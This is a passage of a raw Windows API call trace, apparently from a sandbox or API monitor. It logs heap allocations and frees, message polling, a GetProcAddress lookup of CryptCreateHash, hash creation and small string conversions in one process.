(in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0248.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.897] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0248.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51838, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0248.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.897] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0248.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.898] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0248.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0248.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55038 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0248.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0248.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.904] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0248.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0248.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0248.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0248.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 